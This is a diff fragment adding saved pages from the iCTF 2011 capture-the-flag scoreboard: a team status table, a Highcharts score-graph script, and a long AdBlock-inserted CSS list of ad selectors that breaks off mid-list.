alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>83</td><td><img width="20px" height="="20px"" src="172.jpg"><b> C.o.P </b></td><td>FR <img src="fr.png"></td><td><b>0.0</b></td><td>1384</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>84</td><td><img width="20px" height="="20px"" src="205.jpg"><b> Dakota State University </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>555</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>85</td><td><img width="20px" height="="20px"" src="203.jpg"><b> TeamSheep </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>145</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>86</td><td><img width="20px" height="="20px"" src="211.jpg"><b> WTF </b></td><td>RU <img src="ru.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>87</td><td><img width="20px" height="="20px"" src="214.jpg"><b> Pwn State </b></td><td>US <img src="us.png"></td><td><b>0.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr></tbody></table> +</div> + + +</body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/score-graph.html b/ictf2011/scoreboard.ictf2011.info_files/score-graph.html @@ -0,0 +1,93 @@ +<!DOCTYPE html> +<!-- saved from url=(0048)http://scoreboard.ictf2011.info/score-graph.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Score Graph</title> + +<script type="text/javascript" src="jquery.min.js"></script> +<script type="text/javascript" src="highcharts.js"></script> +<script type="text/javascript" src="exporting.js"></script> +<script type="text/javascript" src="gray.js"></script> + +<script type="text/javascript"> +var chart; +function UpdateGraph(destroy) +{ +$.getJSON("json/score_graph.json",function(data) +{ +if(destroy) +{ + chart.destroy(); + delete chart; + chart = new Highcharts.Chart(option); +} +$.each(data.scores,function(i,s){ + if(i>9) + { + return; + } + chart.addSeries(s,false); + +}); +chart.redraw(); +}); +} + +$(document).ready(function() { +option = { +chart: { + renderTo: 'container', + defaultSeriesType: 'line', + zoomType: 'x', +}, +credits: {enabled: false}, +title: { + text: 'iCTF 2011 Score', + x: -20 //center +}, +subtitle: { + text: 'http://ictf2011.info', + x: -20 +}, +xAxis: { + title: { text: 'Ticks' }, +}, +yAxis: { + title: { + text: 'Points' + }, + plotLines: [{ + value: 0, + width: 1, + color: '#808080' + }] +}, +tooltip: { + formatter: function() { + return '<b>'+ this.series.name +'</b> : '+ + this.y +'<br/>( at tick '+ this.x+' )'; + } +}, +legend: { + layout: 'vertical', + align: 'right', + verticalAlign: 'top', + x: -10, + y: 100, + borderWidth: 0 +}, +}; +chart = new Highcharts.Chart(option); +UpdateGraph(0); +setInterval("UpdateGraph(1)",30000); +}); +// Apply the theme +var highchartsOptions = Highcharts.setOptions(Highcharts.theme); +</script> +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#bo